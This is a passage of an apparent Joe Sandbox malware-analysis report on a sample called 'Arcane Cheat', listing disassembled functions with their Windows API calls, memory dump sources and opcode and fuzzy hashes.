                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Gdip$AllocBitmapCreateFromStream
                                  • String ID:
                                  • API String ID: 1915507550-0
                                  • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                  • Instruction ID: 833c7368aacdc551c91fe682a4ffbd32a974ab16595b46af2d532578e2de482c
                                  • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                  • Instruction Fuzzy Hash: 5ED0C73065420D7ADF41BA759C0397ABBA9FB81350F104565FC48D6251EFB1DE10A6E2
                                  Function 00829989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileType.KERNELBASE(000000FF,00829887), ref: 00829995
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: FileType
                                  • String ID:
                                  • API String ID: 3081899298-0
                                  • Opcode ID: ba7c6a05958326bba2f4d975a6e0edaf5783346da60f4d3bf975d359186a49f5
                                  • Instruction ID: ef686b86518eb51d6b30c2aa210012eca599fdfec0ceadf40eef205d0a86829f
                                  • Opcode Fuzzy Hash: ba7c6a05958326bba2f4d975a6e0edaf5783346da60f4d3bf975d359186a49f5
                                  • Instruction Fuzzy Hash: 9FD01231011650958F2147356D090997F51FB833B7F38C6A8D0A5C40A1D723C8C3F581
                                  Function 0083D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0083D43F
                                    • Part of subcall function 0083AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0083AC85
                                    • Part of subcall function 0083AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0083AC96
                                    • Part of subcall function 0083AC74: IsDialogMessageW.USER32(00010450,?), ref: 0083ACAA
                                    • Part of subcall function 0083AC74: TranslateMessage.USER32(?), ref: 0083ACB8
                                    • Part of subcall function 0083AC74: DispatchMessageW.USER32(?), ref: 0083ACC2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Message$DialogDispatchItemPeekSendTranslate
                                  • String ID:
                                  • API String ID: 897784432-0
                                  • Opcode ID: dbd66cc31af6ca57947baa43e4ee6fc6f405c04c9f2f566657bdf784e03edf1c
                                  • Instruction ID: 0881ce941c2c7d26c0e89e7920e6ab4b3e5c1713b1f32e32652dd7333732d460
                                  • Opcode Fuzzy Hash: dbd66cc31af6ca57947baa43e4ee6fc6f405c04c9f2f566657bdf784e03edf1c
                                  • Instruction Fuzzy Hash: A1D09E31144300ABD6162B55DE06F0F7AA6FB98B04F404664B389B40B28A62AD21DB17
                                  Function 0083D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 1c65bb7a73c30b074939b8a3482fb351af98c346fcfd21b4ea1426926767da85
                                  • Instruction ID: 61d4e7c19450ba83cf68cd641e2bda219172ff3c1beff18e1783890652dc03e6
                                  • Opcode Fuzzy Hash: 1c65bb7a73c30b074939b8a3482fb351af98c346fcfd21b4ea1426926767da85
                                  • Instruction Fuzzy Hash: 72B012E926C3017C310932487C96C3B021CF4C0B11730493AB509E00C0E8407C4C4572
                                  Function 0083D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: d99f6709155d5ee692bc040b763706c5cdd41bd621ddf93909c008bded5c4a79
                                  • Instruction ID: 7d40973c9f4c8c7fa032df937b7d0d7387c7d2d39cb6d101bec77f5ccc9188e4
                                  • Opcode Fuzzy Hash: d99f6709155d5ee692bc040b763706c5cdd41bd621ddf93909c008bded5c4a79
                                  • Instruction Fuzzy Hash: F6B012E926C3056C7109724C7C86D3B025CF4C0F11730442AB509D01C0D8407C0C0672
                                  Function 0083D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 1a7a00d13903bb238557fbb12e92a5e902a1f7c341b79bf52a4679c56f1e0ee4
                                  • Instruction ID: 3d9f30b6cdbacd168560593f86fe6d147f568691903072d042fc63293817643e
                                  • Opcode Fuzzy Hash: 1a7a00d13903bb238557fbb12e92a5e902a1f7c341b79bf52a4679c56f1e0ee4
                                  • Instruction Fuzzy Hash: 9BB012E526C2016C3108724C7D46D36021CF4C1B11730C42ABD09D02C0D8407C0D0572
                                  Function 0083D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 28a30ce51c7439c14e9dd2c70cc0622460ceb5184161313db2ae1bdda37bb9a9
                                  • Instruction ID: f61c3eacf6bf44645569f28ac63d1e21e69afeb3afbbfc4e927d82ea655b6566
                                  • Opcode Fuzzy Hash: 28a30ce51c7439c14e9dd2c70cc0622460ceb5184161313db2ae1bdda37bb9a9
                                  • Instruction Fuzzy Hash: 24B012E526C3016C3148724C7D46D36021CF4C0B11730852AB519D02C0D8407C8D0672
                                  Function 0083D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: c823c2cc1ce211f930299a2f6b6f00458c4375a593d2f6a6cc871557da5d253a
                                  • Instruction ID: b703379de8ff9e301a4a42ad53e85f021a80afe8597d554a35a7c6c3ec428ec7
                                  • Opcode Fuzzy Hash: c823c2cc1ce211f930299a2f6b6f00458c4375a593d2f6a6cc871557da5d253a
                                  • Instruction Fuzzy Hash: F8B012E526C2016C310C724C7E86D36021CF4C0B11730842AB509D02C0D8507C0E0572
                                  Function 0083D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 2f0d86ba7659093293fcbd60746baf6870802bb0739a89b0a2028941c25057f7
                                  • Instruction ID: f8d95420a6954ab974a6b2359d885659f3308fbb0632dafbfc089d8c6ce2652c
                                  • Opcode Fuzzy Hash: 2f0d86ba7659093293fcbd60746baf6870802bb0739a89b0a2028941c25057f7
                                  • Instruction Fuzzy Hash: 38B012F52AC201AC3108724C7C46D36021DF4C1B11730842ABD0DD01C0D8407C0C0572
                                  Function 0083D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 0a88479df7396a77593e7e313840f12b385ebf338b92a91b9a84ff6f9a1a4e86
                                  • Instruction ID: 84a0b6fac9accfded269739b5fc9097c37b8cc442d86e8f1225d01093d562b42
                                  • Opcode Fuzzy Hash: 0a88479df7396a77593e7e313840f12b385ebf338b92a91b9a84ff6f9a1a4e86
                                  • Instruction Fuzzy Hash: C8B012F52AC301AC3148724C7C46D36021DF4C0B11B30452AB50DD01C0D8407C4C0672
                                  Function 0083D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: e527b61eedbd55337c6e4c627bddb91bce859a76520cbd4f0a66ddad420d31fd
                                  • Instruction ID: 94f5f8e1bbac96f5281ab0c5a2121ed6cb1fc7a991977e710283596dd293b905
                                  • Opcode Fuzzy Hash: e527b61eedbd55337c6e4c627bddb91bce859a76520cbd4f0a66ddad420d31fd
                                  • Instruction Fuzzy Hash: CEB012F52AC201AC310C724C7D86D36021DF4C0B11730442AB50DD01C0D8407D0D0572
                                  Function 0083D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 6ad8d5b18c77cf5fb62436d153bbddde0916eda6dde1c403aa6bcb70bd012cac
                                  • Instruction ID: a6ec4bb6cef9a8c19684666462624b5173f99a64e49bc6bdee2dbc8a94311174
                                  • Opcode Fuzzy Hash: 6ad8d5b18c77cf5fb62436d153bbddde0916eda6dde1c403aa6bcb70bd012cac
                                  • Instruction Fuzzy Hash: 83B012F52AC201AC310C724D7C46D36025DF4C0F11730442AB50DD01C0D8407C0C0572
                                  Function 0083D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 37a1ce8d9f8aad271e2e9ec5d1246ec189ec2b977f112486abe8a4092a99014c
                                  • Instruction ID: ee158fe57e7802fbcf79a571957a6821b98d582653b374c548f2b66fe90b0dcc
                                  • Opcode Fuzzy Hash: 37a1ce8d9f8aad271e2e9ec5d1246ec189ec2b977f112486abe8a4092a99014c
                                  • Instruction Fuzzy Hash: 5BB012E526D2026C3108724C7C4AD37021EF4C1B11B30842ABD09D01C0D844BC0C0572
                                  Function 0083D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 75adcd4532d3577d8b4a3a3999515b800038f559e92673d03732bb57faf58171
                                  • Instruction ID: fb90626e79287724e084a8487eae0a4c2433942b5d4ab8c31cecb76401b477e2
                                  • Opcode Fuzzy Hash: 75adcd4532d3577d8b4a3a3999515b800038f559e92673d03732bb57faf58171
                                  • Instruction Fuzzy Hash: 53B012F526D3026C3148734C7C4AD36021EF4C0B11B30452AB509D01C0D844BC4C0672
                                  Function 0083D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 2be1f2df52105093594e9f74160e899f6590b7a9b8e47e71955f093fc671ba76
                                  • Instruction ID: 460823f096ffe4310960d927d66c9c09f15ac15373443c44e89652c3bf64afdf
                                  • Opcode Fuzzy Hash: 2be1f2df52105093594e9f74160e899f6590b7a9b8e47e71955f093fc671ba76
                                  • Instruction Fuzzy Hash: DCB012E527D2026C3108728C7C4AD36029EF8C0F11B30442AB509D01C0D844BC0C0572
                                  Function 0083D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
